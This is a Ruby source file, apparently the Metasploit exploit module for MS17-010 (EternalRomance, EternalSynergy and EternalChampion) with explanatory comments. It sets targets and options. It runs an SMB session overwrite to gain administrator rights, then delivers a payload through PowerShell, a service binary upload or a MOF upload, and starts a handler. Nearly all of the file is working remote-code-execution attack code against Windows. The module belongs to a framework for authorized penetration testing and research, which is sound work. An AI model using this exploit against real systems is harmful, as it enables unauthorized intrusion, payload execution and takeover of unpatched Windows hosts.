GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/ms17_010_psexec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
# Local Security Settings >
# Local Policies >
# Security Options >
# Network Access: Sharing and security model for local accounts
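# MS17-010 (EternalRomance/EternalSynergy/EternalChampion) + psexec.
#
# This class is glue: the MS17-010 write-what-where and the session overwrite
# live in the Psexec_MS17_010 mixin (eternal_pwn / eternal_cleanup), and the
# post-authentication service/PowerShell/MOF delivery lives in the Psexec,
# Powershell and WbemExec mixins. Hosts with the MS17-010 update applied are
# not affected; the default CheckModule (auxiliary/scanner/smb/smb_ms17_010)
# is what the check action relies on to tell.
#
# Because eternal_pwn tampers with the target's connection session state,
# every exploit path -- success or failure -- ends in eternal_cleanup so the
# original state is restored (see #exploit).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # Order matters: Psexec_MS17_010 must precede Psexec so its overrides win.
  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
  include Msf::Exploit::Remote::SMB::Client::Psexec
  include Msf::Exploit::Remote::CheckModule
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Auxiliary::Report

  # Declare module metadata, targets and options.
  #
  # @param info [Hash] module info to merge via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',
        'Description' => %q{
          This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
          primitive. This will then be used to overwrite the connection session information with as an
          Administrator session. From there, the normal psexec payload code execution is done.

          Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
          Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
          exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
          named pipe.
        },
        'Author' => [
          'sleepya', # zzz_exploit idea and offsets
          'zerosum0x0',
          'Shadow Brokers',
          'Equation Group'
        ],
        'License' => MSF_LICENSE,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',
          'WfsDelay' => 10
        },
        'References' => [
          [ 'MSB', 'MS17-010' ],
          [ 'CVE', '2017-0143' ], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests
          [ 'CVE', '2017-0146' ], # EternalChampion/EternalSynergy - Race condition with Transaction requests
          [ 'CVE', '2017-0147' ], # for EternalRomance reference
          [ 'URL', 'https://github.com/worawit/MS17-010' ],
          [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
          [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_001_POWERSHELL ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1077_WINDOWS_ADMIN_SHARES ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1569_002_SERVICE_EXECUTION ]
        ],
        'Payload' => {
          'Space' => 3072,
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [ 'Automatic', {} ],
          [ 'PowerShell', {} ],
          [ 'Native upload', {} ],
          [ 'MOF upload', {} ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2017-03-14',
        'Notes' => {
          'AKA' => [
            'ETERNALSYNERGY',
            'ETERNALROMANCE',
            'ETERNALCHAMPION',
            'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred
          ],
          'Stability' => UNKNOWN_STABILITY,
          'Reliability' => UNKNOWN_RELIABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('SHARE', [ true, 'The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share', 'ADMIN$' ])
      ]
    )

    register_advanced_options(
      [
        OptBool.new('ALLOW_GUEST', [true, 'Keep trying if only given guest access', false]),
        OptString.new('SERVICE_FILENAME', [false, 'Filename to be used on target for the service binary', nil]),
        OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),
        OptString.new('SERVICE_STUB_ENCODER', [false, 'Encoder to use around the service registering stub', nil])
      ]
    )

    # The MS17-010 mixin owns the connection, and the Transaction/WriteAndX
    # primitives it relies on are SMB1-only, so a user-selectable protocol
    # version would be misleading here.
    deregister_options('SMB::ProtocolVersion')
  end

  # Fail fast if SERVICE_STUB_ENCODER names an encoder the framework does not have.
  #
  # An unset or empty option is valid (no encoder is used).
  #
  # @raise [Msf::OptionValidateError] when the named encoder cannot be found
  # @return [void]
  def validate_service_stub_encoder!
    service_encoder = datastore['SERVICE_STUB_ENCODER']
    return if service_encoder.nil? || service_encoder.empty?
    return unless framework.encoders[service_encoder].nil?

    raise Msf::OptionValidateError.new(
      { 'SERVICE_STUB_ENCODER' => "Failed to find encoder #{service_encoder.inspect}" }
    )
  end

  # Entry point: validate options, run the MS17-010 session overwrite, then the
  # psexec-style delivery stage.
  #
  # Option validation sits outside the begin/rescue on purpose so that a bad
  # SERVICE_STUB_ENCODER surfaces as an option error instead of being swallowed
  # by the generic rescue below. Everything after that is reported rather than
  # propagated, because eternal_cleanup must always run to restore the session
  # state eternal_pwn modified on the target.
  #
  # @return [void]
  def exploit
    validate_service_stub_encoder!

    begin
      if datastore['SMBUser'].present?
        print_status("Authenticating to #{datastore['RHOST']} as user '#{splitname(datastore['SMBUser'])}'...")
      end
      eternal_pwn(datastore['RHOST'])
      smb_pwn
    rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e
      # The mixin already phrases these for the operator.
      print_error(e.message)
    rescue ::Errno::ECONNRESET,
           ::Rex::Proto::SMB::Exceptions::LoginError,
           ::Rex::HostUnreachable,
           ::Rex::ConnectionTimeout,
           ::Rex::ConnectionRefused => e
      print_error("#{e.class}: #{e.message}")
    rescue => error
      # Anything unexpected: dump class, message and backtrace for diagnosis.
      print_error(error.class.to_s)
      print_error(error.message)
      print_error(error.backtrace.join("\n"))
    ensure
      eternal_cleanup # restore session
    end
  end

  # Run the delivery stage chosen by the target, then start the payload handler.
  #
  # 'Automatic' probes for powershell.exe on the selected share (PSH_PATH) and
  # falls back to uploading a native service binary when it is not found.
  # SERVICE_FILENAME defaults to a random 8-letter name with an .exe suffix.
  #
  # @return [void]
  def smb_pwn
    share = datastore['SHARE']
    service_filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
    service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''

    case target.name
    when 'Automatic'
      if powershell_installed?(share, datastore['PSH_PATH'])
        print_status('Selecting PowerShell target')
        execute_powershell_payload
      else
        print_status('Selecting native target')
        native_upload(share, service_filename, service_encoder)
      end
    when 'PowerShell'
      execute_powershell_payload
    when 'Native upload'
      native_upload(share, service_filename, service_encoder)
    when 'MOF upload'
      mof_upload(share)
    end

    handler
  end
end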